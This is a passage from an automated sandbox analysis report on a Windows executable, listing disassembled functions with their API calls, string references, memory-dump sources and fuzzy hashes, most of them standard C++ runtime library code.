Instruction Fuzzy Hash: A0414A71900209AFCF19EFA4CC81EAEBBF5FF48300F188199F91467222D7359950DB51

Function 00B73E90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B73EC6
std::_Lockit::~_Lockit.LIBCPMT ref: 00B74002

Part of subcall function 00B7ABC5: _Yarn.LIBCPMT ref: 00B7ABE5
Part of subcall function 00B7ABC5: _Yarn.LIBCPMT ref: 00B7AC09

Strings

bad locale name, xrefs: 00B73F46

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: LockitYarnstd::_$Lockit::_Lockit::~_
String ID: bad locale name
API String ID: 2070049627-1405518554
Opcode ID: 24d541ebda7e90e1d2c851e376337dcfc49114ff885f7bfdcee90cb1f8029ee7
Instruction ID: f7b4458868a48f96cf0cfdf51927777dca0f40817e1f8b31ba933e53b840941c
Opcode Fuzzy Hash: 24d541ebda7e90e1d2c851e376337dcfc49114ff885f7bfdcee90cb1f8029ee7
Instruction Fuzzy Hash: BA418EF0A007459BEB10DF69C805B1BBBF8BF04B14F044668E4599B781E37AE518CBE2

Function 00B8B1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00B8B475

Strings

csm, xrefs: 00B8B497
csm, xrefs: 00B8B508

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: ffb2a676be0d5cce76884b47ac49c52d6938f600e9ef5da4f821cb5ade56852e
Instruction ID: bdcb906ff9e53c33ed9b2eb7f7e11dc47d3f427084da7d15f7b684ef6cfff53f
Opcode Fuzzy Hash: ffb2a676be0d5cce76884b47ac49c52d6938f600e9ef5da4f821cb5ade56852e
Instruction Fuzzy Hash: 3131C671410215EBCF26AF60CC51CEA7BE6FF19315B1846DAF85549232C332DD61DB81

Function 00B7B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00B7B8B9
RaiseException.KERNEL32(?,?,?,?,?), ref: 00B7B8DE

Part of subcall function 00B8060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B7F354,00492690,?,?,?,00B7F354,00B73D4A,00BA759C,00B73D4A), ref: 00B8066D

Part of subcall function 00B88353: IsProcessorFeaturePresent.KERNEL32(00000017,00B8C224), ref: 00B8836F

Strings

csm, xrefs: 00B7B86D

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: c40f2782eb6b7b1a09934d1ef88124a65e1d4a97932240e0c3a509c905109ec3
Instruction ID: 052462dde8d2166ac83dad6dddb28942816795aac67f5bbcf8e90d5dae55e843
Opcode Fuzzy Hash: c40f2782eb6b7b1a09934d1ef88124a65e1d4a97932240e0c3a509c905109ec3
Instruction Fuzzy Hash: 02219D31D00218EBCF24DF99C845BAEB7F8EF44710F148499E469AB150CB70AE45DF92

Function 00B7B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00B72673

Strings

bad array new length, xrefs: 00B72626
ios_base::badbit set, xrefs: 00B72650

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 2659868963-1158432155
Opcode ID: fc5eb0b1686d122dee2d2589855bda78080fd1c14a7a8aa4a6a64acd37902d9b
Instruction ID: e1ffc17632247593de32c96ff616540d07306462224550819390ec3e6fc90a48
Opcode Fuzzy Hash: fc5eb0b1686d122dee2d2589855bda78080fd1c14a7a8aa4a6a64acd37902d9b
Instruction Fuzzy Hash: 6301DFF2518300ABDB04EF28D856A1A7BE4EF05318F1088ADF46D9B311E775E808CB81

Function 00B72610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B8060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B7F354,00492690,?,?,?,00B7F354,00B73D4A,00BA759C,00B73D4A), ref: 00B8066D

___std_exception_copy.LIBVCRUNTIME ref: 00B72673

Strings

bad array new length, xrefs: 00B72626
ios_base::badbit set, xrefs: 00B72650

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 3109751735-1158432155
Opcode ID: f075f5b5beac347437f3026137740bf5fbea3f3c8edfed9a3ee2f99f5f282105
Instruction ID: 9cfe39220b1f00aa9a2193bce93b6d0dbf16d5d9af995b07cbc3286b6fe1ec47
Opcode Fuzzy Hash: f075f5b5beac347437f3026137740bf5fbea3f3c8edfed9a3ee2f99f5f282105
Instruction Fuzzy Hash: EAF030F2918300ABDB00AF19DC4674BBBE4EB55758F018CADF598AB311D3B5D448CB92

Analysis Process: 0x001f00000004676d-1858.exePID: 4996, Parent PID: 6192COMMON

Non-executed Functions

Function 00B91A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00B913BD,00000002,00000000,?,?,?,00B913BD,?,00000000), ref: 00B91AA0
GetLocaleInfoW.KERNEL32(?,20001004,00B913BD,00000002,00000000,?,?,?,00B913BD,?,00000000), ref: 00B91AC9
GetACP.KERNEL32(?,?,00B913BD,?,00000000), ref: 00B91ADE

Strings

ACP, xrefs: 00B91A25
OCP, xrefs: 00B91A5B

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 4a4b8428427dae3a982c9801b9d2256bedecd8bc1532d51afa9378a0d9e74a89
Instruction ID: 7693774284dd1cd9633a2ffce025f4e56f15c1eb62c4f61daad01fe76472283a
Opcode Fuzzy Hash: 4a4b8428427dae3a982c9801b9d2256bedecd8bc1532d51afa9378a0d9e74a89
Instruction Fuzzy Hash: E821A732702102AADF35CB6CC901A9B73E6EB51B64B9688F4E929D7110F731DD40E750

Function 00B71FB0 Relevance: 7.7, APIs: 5, Instructions: 200fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B71240: _strlen.LIBCMT ref: 00B712BA

GetFileSize.KERNEL32(00000000,00000000), ref: 00B72046
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B7206B
CloseHandle.KERNEL32(00000000), ref: 00B7207A
_strlen.LIBCMT ref: 00B720CD
CloseHandle.KERNEL32(00000000), ref: 00B721FD

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CloseFileHandle_strlen$ReadSize
String ID:
API String ID: 1490117831-0
Opcode ID: 4d9e2bd90717c7786e7c8e1dace52469f60e8a4101f9433d30703c01b081953c
Instruction ID: a2fe955e492f3475b85d5bc657e470af6e5f165761a29fa69071215bc937a9a0
Opcode Fuzzy Hash: 4d9e2bd90717c7786e7c8e1dace52469f60e8a4101f9433d30703c01b081953c
Instruction Fuzzy Hash: 8571D6B2C002149BCB10DF68DC45BAEBBF5FF49320F184669E829B7391E7319945CBA1

Function 00B91287 Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00B8C16A: GetLastError.KERNEL32(00000000,?,00B8E58D), ref: 00B8C16E
Part of subcall function 00B8C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00B88363), ref: 00B8C210

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00B9138F
IsValidCodePage.KERNEL32(00000000), ref: 00B913CD
IsValidLocale.KERNEL32(?,00000001), ref: 00B913E0
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B91428
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B91443

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 658b3c33dfca7991f0f3f62baa516e8ead90f4dc5d9a534952c12e2a2d377daa
Instruction ID: b700a89b7b410bd526a8da4c87a1602a18f475bff7bd275f38938bf76686d963
Opcode Fuzzy Hash: 658b3c33dfca7991f0f3f62baa516e8ead90f4dc5d9a534952c12e2a2d377daa
Instruction Fuzzy Hash: 30515171A04206ABDF10EFA9CC45ABE77F8EF09740F5448B9F511EB291EB709A40DB61

Function 00B89CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction ID: c8326d8d7ecf0d2c04684f1e2c6b6f2942f18999f43745b020912d685d6221bf
Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction Fuzzy Hash: 38022C71E012199BDF14EFA9C8806AEFBF1FF48314F2482AAE519E7350D731A945CB90

Function 00B91FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B920D9

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1518ff95ec45caac153b227194f641d55b4d69167468804744a36e5f27fa9ab9
Instruction ID: 886aa6e354331661690172088da5db85268f11ed5c5a9ddf6864950ccfb2a54c
Opcode Fuzzy Hash: 1518ff95ec45caac153b227194f641d55b4d69167468804744a36e5f27fa9ab9
Instruction Fuzzy Hash: 7571D3B1D05169AFDF25AF38DC89ABAB7F9EB05300F1441E9E048A3251DB314E85DF10

Function 00B7F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00B7F8F5
IsDebuggerPresent.KERNEL32 ref: 00B7F9C1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B7F9DA
UnhandledExceptionFilter.KERNEL32(?), ref: 00B7F9E4

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3b52a0f0a31556e88d76f4d2a610dc9d1549ecbd325f8703d9cf82f69c5b29f8
Instruction ID: af4337da26ed917b2f3f5a2e375555e7c9b5f8ba4124b8bc4e18cd40ea237da4
Opcode Fuzzy Hash: 3b52a0f0a31556e88d76f4d2a610dc9d1549ecbd325f8703d9cf82f69c5b29f8
Instruction Fuzzy Hash: 0331F6B5D05219ABDF21EFA4D9497CDBBF8AF08300F1041EAE50CAB250EB719A84CF45

Function 00B9AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,00B9AACD,?,?,?,?,?,?,?,?,?,?), ref: 00B9AB88
__alloca_probe_16.LIBCMT ref: 00B9AC43
__alloca_probe_16.LIBCMT ref: 00B9ACD2
__freea.LIBCMT ref: 00B9AD1D
__freea.LIBCMT ref: 00B9AD23
__freea.LIBCMT ref: 00B9AD59
__freea.LIBCMT ref: 00B9AD5F
__freea.LIBCMT ref: 00B9AD6F

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 5e45bdbd622f7a0594066628a82ca7effbb1520d016465f520febb8c4cfb4dc7
Instruction ID: b8275fa8d3169854d36aa42d2449530e18b22081458fe8f28e1849e9cda65eb6
Opcode Fuzzy Hash: 5e45bdbd622f7a0594066628a82ca7effbb1520d016465f520febb8c4cfb4dc7
Instruction Fuzzy Hash: 7871B47290020A6BDF219E648C91FAF7BFADF45711F2940F5E914AB291E7359C40C7D2

Function 00B7FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00B7FE70
__alloca_probe_16.LIBCMT ref: 00B7FE9C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00B7FEDB
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B7FEF8
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B7FF37
__alloca_probe_16.LIBCMT ref: 00B7FF54
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00B7FF96
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00B7FFB9

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 7079d43d8ab42ac0c9db98795578c0df164ff37bae756fb7125bcce10fdfda6d
Instruction ID: 4241b93d01372f42703b401ebf83d7d39fd2f7e91ad3815dd32add53b2ea0ca9
Opcode Fuzzy Hash: 7079d43d8ab42ac0c9db98795578c0df164ff37bae756fb7125bcce10fdfda6d
Instruction Fuzzy Hash: DB516C7261121BABEB205F60CC45FBA7BE9EF41750F1484B5F929DA1A0DB708D10DB58

Function 00B8EE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B8EEFC

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction ID: 33e51135d0987bb2dddf7920b2e4689ba479f0d9c0daed22b5e17fa78c1af9f7
Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction Fuzzy Hash: B3B14372A00356AFEB11AF68CC81BBEBBE5EF55310F1441E5E954AB392D274DD01CBA0

Function 00B80D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B80D77
___except_validate_context_record.LIBVCRUNTIME ref: 00B80D7F
_ValidateLocalCookies.LIBCMT ref: 00B80E08
__IsNonwritableInCurrentImage.LIBCMT ref: 00B80E33
_ValidateLocalCookies.LIBCMT ref: 00B80E88

Strings

csm, xrefs: 00B80E1D

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: ff2a7510e09845fb58b5c9697071c918d7d540fb5eb118434f47ec30f90c6148
Instruction ID: 8717e6ea77e043b5bf3b7afbbdf40292e8098966db9eaad1e85a0d42fa521f20
Opcode Fuzzy Hash: ff2a7510e09845fb58b5c9697071c918d7d540fb5eb118434f47ec30f90c6148
Instruction Fuzzy Hash: 4741B030E10218ABCF10FF68C884A9EBBE5EF45355F1488E5E9145B272DB31AD19CB91

Function 00B724B0 Relevance: 10.6, APIs: 7, Instructions: 83threadCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 00B724DD
ShowWindow.USER32(00000000,00000000), ref: 00B724E6
GetCurrentThreadId.KERNEL32 ref: 00B72524

Part of subcall function 00B7F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00B7253A,?,?,00000000), ref: 00B7F129
Part of subcall function 00B7F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00B7253A,?,?,00000000), ref: 00B7F142
Part of subcall function 00B7F11D: CloseHandle.KERNEL32(?,?,?,00B7253A,?,?,00000000), ref: 00B7F154

std::_Throw_Cpp_error.LIBCPMT ref: 00B72567
std::_Throw_Cpp_error.LIBCPMT ref: 00B72578
std::_Throw_Cpp_error.LIBCPMT ref: 00B72589
std::_Throw_Cpp_error.LIBCPMT ref: 00B7259A

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
